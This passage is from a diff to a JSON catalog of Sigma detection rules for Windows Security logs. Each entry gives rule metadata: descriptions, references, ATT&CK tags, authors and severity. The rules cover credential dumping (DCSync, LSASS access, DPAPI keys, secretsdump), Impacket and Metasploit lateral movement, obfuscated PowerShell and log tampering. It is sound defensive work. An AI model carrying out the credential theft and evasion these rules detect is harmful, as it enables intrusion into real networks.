"https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" + ], + "creation_date": "2018/06/03", + "filename": "win_security_dcsync.yml", + "author": "Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu", + "level": "high", + "falsepositive": [ + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "uuid": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "value": "Windows Defender Exclusion Set", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_defender_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2019/10/26", + "filename": "win_security_defender_bypass.yml", + "author": "@BarryShooshooga", + "level": "high", + "falsepositive": [ + "Intended inclusions by administrator" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects an installation of a device that is forbidden by the system policy", + "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", + "value": "Device Installation Blocked", + "meta": { + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "win_security_device_installation_blocked.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "value": "DiagTrackEoP Default Login Username", + "meta": { + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/08/03", + "filename": "win_security_diagtrack_eop_default_login_username.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", + "value": "Disabling Windows Event Auditing", + "meta": { + "refs": [ + "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2017/11/19", + "filename": "win_security_disable_event_logging.yml", + "author": "@neu5ron", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", + "value": "DPAPI Domain Backup Key Extraction", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.004" + ], + "creation_date": "2019/06/20", + "filename": "win_security_dpapi_domain_backupkey_extraction.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "value": "DPAPI Domain Master Key Backup Attempt", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.004" + ], + "creation_date": "2019/08/10", + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "value": "COMPlus_ETWEnabled Registry Modification", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_etw_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/06/05", + "filename": "win_security_etw_modification.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "uuid": "a122ac13-daf8-4175-83a2-72c387be339d", + "value": "Security Event Log Cleared", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_event_log_cleared.yml" + ], + "tags": [ + "attack.t1070.001" + ], + "creation_date": "2021/08/15", + "filename": "win_security_event_log_cleared.yml", + "author": "Saw Winn Naung", + "level": "medium", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "uuid": "8fe1c584-ee61-444b-be21-e9054b229694", + "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "meta": { + "refs": [ + "https://twitter.com/INIT_3/status/1410662463641731075", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" + ], + "creation_date": "2021/07/02", + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml", + "author": "INIT_6", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "value": "External Disk Drive Or USB Storage Device", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" + ], + "tags": [ + "attack.t1091", + "attack.t1200", + "attack.lateral_movement", + "attack.initial_access" + ], + "creation_date": "2019/11/20", + "filename": "win_security_external_device.yml", + "author": "Keith Wright", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.", + "uuid": "619b020f-0fd7-4f23-87db-3f51ef837a34", + "value": "Enumeration via the Global Catalog", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_global_catalog_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ], + "creation_date": "2020/05/11", + "filename": "win_security_global_catalog_enumeration.yml", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "level": "medium", + "falsepositive": [ + "Exclude known DCs." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "value": "Persistence and Execution at Scale via GPO Scheduled Task", + "meta": { + "refs": [ + "https://twitter.com/menasec1/status/1106899890377052160", + "https://www.secureworks.com/blog/ransomware-as-a-distraction", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" + ], + "creation_date": "2019/04/03", + "filename": "win_security_gpo_scheduledtasks.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "value": "Hidden Local User Creation", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1387743867663958021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2021/05/03", + "filename": "win_security_hidden_user_creation.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "value": "HybridConnectionManager Service Installation", + "meta": { + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ], + "creation_date": "2021/04/12", + "filename": "win_security_hybridconnectionmgr_svc_installation.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Legitimate use of Hybrid Connection Manager via Azure function apps." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of Impacket's psexec.py.", + "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", + "value": "Impacket PsExec Execution", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/12/14", + "filename": "win_security_impacket_psexec.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "value": "Possible Impacket SecretDump Remote Activity", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" + ], + "creation_date": "2019/04/03", + "filename": "win_security_impacket_secretdump.yml", + "author": "Samir Bousseaden, wagga", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "value": "Invoke-Obfuscation CLIP+ Launcher - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "win_security_invoke_obfuscation_clip_services_security.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "meta": { + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2019/11/08", + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "value": "Invoke-Obfuscation STDIN+ Launcher - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", + "value": "Invoke-Obfuscation VAR+ Launcher - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "win_security_invoke_obfuscation_var_services_security.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", + "value": "Invoke-Obfuscation Via Stdin - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/12", + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "value": "Invoke-Obfuscation Via Use Clip - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", + "value": "Invoke-Obfuscation Via Use MSHTA - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "value": "Invoke-Obfuscation Via Use Rundll32 - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the mount of ISO images on an endpoint", + "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "value": "ISO Image Mount", + "meta": { + "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://twitter.com/MsftSecIntel/status/1257324139515269121", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2021/05/29", + "filename": "win_security_iso_mount.yml", + "author": "Syed Hasan (@syedhasan009)", + "level": "medium", + "falsepositive": [ + "Software installation ISO files" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "value": "First Time Seen Remote Named Pipe", + "meta": { + "refs": [ + "https://twitter.com/menasec1/status/1104489274387451904", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2019/04/03", + "filename": "win_security_lm_namedpipe.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.", + "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", + "value": "Correct Execution of Nltest.exe", + "meta": { + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", + "https://attack.mitre.org/software/S0359/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482", + "attack.t1018", + "attack.t1016" + ], + "creation_date": "2021/10/04", + "filename": "win_security_lolbas_execution_of_nltest.yml", + "author": "Arun Chauhan", + "level": "high", + "falsepositive": [ + "Red team activity", + "Rare legitimate use by an administrator" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "value": "LSASS Access from Non System Account", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2019/06/20", + "filename": "win_security_lsass_access_non_system_account.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", + "value": "Credential Dumping Tools Service Execution - Security", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ], + "creation_date": "2017/03/05", + "filename": "win_security_mal_creddumper.yml", + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "uuid": "cb062102-587e-4414-8efa-dbe3c7bf19c6", + "value": "Malicious Service Installations", + "meta": { + "refs": [ + "https://awakesecurity.com/blog/threat-hunting-for-paexec/", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2017/03/27", + "filename": "win_security_mal_service_installs.yml", + "author": "Florian Roth, Daniil Yugoslavskiy, oscd.community (update)", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "value": "WCE wceaux.dll Access", + "meta": { + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ], + "creation_date": "2017/06/14", + "filename": "win_security_mal_wceaux_dll.yml", + "author": "Thomas Patzke", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Alerts on Metasploit host's authentications on the domain.", + "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", + "value": "Metasploit SMB Authentication", + "meta": { + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/05/06", + "filename": "win_security_metasploit_authentication.yml", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "level": "high", + "falsepositive": [ + "Linux hostnames composed of 16 characters." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "value": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "meta": { + "refs": [ + "https://bczyz1.github.io/2021/01/30/psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2021/01/21", + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", + "author": "Bartlomiej Czyz, Relativity", + "level": "high", + "falsepositive": [ + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + ], + "logsource.category": 